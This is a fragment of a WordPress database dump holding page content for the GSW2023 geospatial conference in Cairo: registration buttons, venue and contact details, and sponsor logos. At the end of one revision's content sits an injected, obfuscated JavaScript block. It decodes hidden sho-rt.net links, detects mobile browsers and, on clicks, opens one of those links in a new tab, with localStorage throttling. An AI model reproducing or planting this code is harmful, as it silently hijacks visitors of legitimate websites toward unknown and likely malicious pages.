enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317489572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 13:33:58','2023-06-09 13:33:58','',3066,'https://gsw2023.com/?p=4638',0,'revision','',0),
(4639,1,'2023-06-09 13:35:27','2023-06-09 13:35:27','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and 